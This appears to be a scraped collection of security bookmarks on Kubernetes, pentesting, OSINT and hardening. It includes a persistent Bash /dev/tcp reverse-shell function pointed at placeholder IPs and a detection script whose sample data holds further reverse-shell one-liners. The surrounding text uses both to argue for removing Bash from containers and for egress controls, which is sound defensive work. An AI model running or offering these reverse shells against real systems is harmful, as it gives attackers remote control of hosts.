GitHub - helm/chart-testing: CLI tool for linting and testing Helm charts.
Introduction to SELinux: Security-Enhanced Linux (SELinux) provides an additional layer of system security. SELinux fundamentally answers the question: May <subject> do <action> to <object>?, for example: May a web…
Kubernetes LAN Party - by Wiz
https://www.bettercap.org/installation/
GitHub - vulnersCom/trivy-plugin-vulners-db
This is a GitBook of mine whose purpose is keeping my pentest notes on hand. It's far from being perfect in terms of organization (that's why I call it "promiscuous") and, basically, I'm logging it for myself, but it turned out that hosting it online makes it most convenient to access. So, if you find it handy too, feel free to use it... responsibly, of course!
GitHub - BishopFox/unredacter: Never ever ever use pixelation as a redaction technique
The open source tool analyzes Kubernetes YAML files and Helm charts to ensure they adhere to best practices, focusing on production readiness and security. Here's how to set it up and use it.
GitHub - StevenBlack/hosts: 🔒 Consolidating and extending hosts files from several well-curated sources. Optionally pick extensions for porn, social media, and other categories.
GitHub - Rolix44/Kubestroyer: Kubernetes exploitation tool.
I hacked into a @Bing CMS that allowed me to alter search results and take over millions of @Office365 accounts. How did I do it? Well, it all started with a simple click in @Azure… 👀 This is the story of #BingBang 🧵⬇️
OWASP has created the OWASP Kubernetes Top 10, which helps identify the most likely risks.
GitHub - 9oelM/elasticpwn: Quickly collect data from thousands of exposed Elasticsearch or Kibana instances and generate a report to be analysed.
GitHub - OWASP/wrongsecrets: Vulnerable app with examples showing how to not use secrets
GitHub - cipher387/OSINT-and-Cybersecurity-accounts-in-Mastodon: This repository brings together tool builders, bloggers, speakers, book authors, and other interesting Mastodon accounts
Hello, we shall run the OWASP Juice Shop as a Deployment and expose it as a Service in a local Kubernetes cluster launched with kind. Hence, familiarity with Kubernetes Deployments and Services is essential to follow along. You can try this with any cluster, though I am using a cluster that was launched with kind. For those not aware, kind is a tool that makes launching k8s clusters on your local machine easy.
Welcome to the page where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.
https://viperone.gitbook.io/pentest-everything/
GitHub - TalEliyahu/awesome-security-newsletters: Periodic cyber security newsletters that capture the latest news, summaries of conference talks, research, best practices, tools, events, vulnerabilities, and analysis of trending threats and attacks
Run Juice Shop on Kubernetes
GitHub - arkenfox/user.js: Firefox privacy, security and anti-tracking: a comprehensive user.js template for configuration and hardening
The long list of this year's hacker attacks in Germany.
It’s been a while since my last post on medium but I’m back, I want to tell you a short story about a private bug bounty program and why you can always check public Repos on GitHub, because you will…
A reference of the reporting settings administrators configure in kibana.yml.
GitHub - Escape-Technologies/awesome-graphql-security: A curated list of awesome GraphQL Security frameworks, libraries, software and resources
GitHub - Proviesec/google-dorks: Useful Google Dorks for WebSecurity and Bug Bounty
Trivy v0.29.0 release brings many updates, such as RBAC security and Helm chart scanning, custom extensions, a Trivy Operator Lens integration, and more
This is the first post in a series called ‘Smashing the Modern Web Tech Stack.’ Web Applications today are more complex than ever. I’m writing this series to organize and process some core ideas and…
https://madhuakula.com/kubernetes-goat/about.html
whatfiles is a Linux utility that logs which files another program reads, writes, creates and deletes on your system. It traces any new processes and threads that are created by the targeted process as well.
GitHub - AppThreat/dep-scan: Fully open-source security audit for project dependencies based on known vulnerabilities and advisories. Supports both local repos and container images. Integrates with various CI environments such as Azure Pipelines, CircleCI, Google CloudBuild. No server required!
GitHub - TCM-Course-Resources/Open-Source-Intellingence-Resources: Compilation of Resources from TCM's OSINT Course.
GitHub - cybersecsi/RAUDI: A repo that automatically generates and keeps updated a series of Docker images through GitHub Actions.
GitHub - sc0tfree/updog: Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use HTTP basic auth.
Using SSH agent forwarding is dangerous. However, a dedicated agent can mitigate the risks.
Important for HCL Connections Automation! The global UseAgentForward needs more documentation and a rework to avoid.
GitHub - CCob/lsarelayx: NTLM relaying for Windows made easy.
A simple Bash reverse shell like this one is a good reason to remove Bash from your containers. It uses Bash's virtual /dev/tcp/ pseudo-device, which is implemented inside the Bash binary rather than by the kernel, so the same one-liner fails under a minimal /bin/sh (dash, BusyBox ash), which does not include this oft-abused feature:

revshell() {
  # Attacker listener; both values are placeholders, overridable as $1 and $2.
  local TARGET_IP="${1:-123.123.123.123}";
  local TARGET_PORT="${2:-1234}";
  # Reconnect forever so the shell survives a dropped listener.
  while :; do
    # "&>" sends stdout and stderr to the TCP socket Bash opens for
    # /dev/tcp/<host>/<port>; "0>&1" then reads stdin from the same socket,
    # giving the listener an interactive bash session.
    nohup bash -i &> \
      /dev/tcp/${TARGET_IP}/${TARGET_PORT} 0>&1;
    sleep 1;
  done
}
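Stripping Bash from the image is the structural fix; while Bash is still present, the same /dev/tcp primitive is easy to spot in process command lines. The script below is an added example written for this note, not code from the page or from any linked project: it greps constructed command lines (as you would extract them from auditd execve records or `ps -eo args`) for /dev/tcp and /dev/udp targets and reduces hits to protocol, host and port. The function names, the regex and the sample input are my own assumptions; the addresses are documentation-range placeholders.

```sh
#!/bin/sh
# Added example, not code from the original page: flag command lines that use
# Bash's /dev/tcp (or /dev/udp) pseudo-device, the primitive behind the reverse
# shell above. Feed one command line per line on stdin.

# Constructed sample input (not captured from a real host). Hosts and ports are
# assumptions chosen from documentation ranges.
SAMPLE_CMDLINES='bash -i >& /dev/tcp/10.0.0.5/4444 0>&1
/usr/bin/python3 app.py --port 8080
sh -c "exec 5<>/dev/tcp/203.0.113.7/53; cat <&5 | while read l; do $l 2>&5 >&5; done"
nginx: worker process
/bin/bash -c "cp /dev/tcp.log /tmp"
bash -c "nohup bash -i &> /dev/tcp/198.51.100.2/1234 0>&1"'

# /dev/tcp/<host>/<port> or /dev/udp/<host>/<port>. Requiring the trailing
# "/<digits>" is what separates the pseudo-device from an ordinary path such as
# /dev/tcp.log, so that sample line is deliberately not a hit.
DEV_TCP_RE='/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+'

# Print the command lines (from stdin) that contain the pattern.
find_dev_tcp_revshells() {
  grep -E "$DEV_TCP_RE"
}

# Reduce matches to "proto host port" triples, one per line, ready for
# blocking or enrichment (who owns 203.0.113.7? is 53/tcp expected here?).
extract_dev_tcp_targets() {
  grep -oE "$DEV_TCP_RE" |
    sed -E 's#^/dev/(tcp|udp)/([^/]+)/([0-9]+)$#\1 \2 \3#'
}

# Number of suspicious command lines in the constructed sample.
count_sample_hits() {
  printf '%s\n' "$SAMPLE_CMDLINES" | find_dev_tcp_revshells | wc -l | tr -d '[:space:]'
}

# Stand-alone run: list the extracted targets from the sample.
printf '%s\n' "$SAMPLE_CMDLINES" | extract_dev_tcp_targets
```

Treat this as a triage aid rather than a control: the string only appears in argv when the attacker types it literally, and `/dev/${X}` or a path assembled at runtime never shows up. An image without Bash removes the primitive entirely, and an egress policy that denies unexpected outbound connections from the container catches the rest regardless of how the socket is opened.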
While Kubernetes has many advantages, it also brings new security challenges.
Securing applications is not the easiest thing to do. An application has many components: server-side logic, client-side logic, data storage, data transportation, API, and more. With all these…
How to configure your browser to block web fonts to speed up your web browsing and protect your privacy.
Vulnerable by design
Container outbreaks and other security related things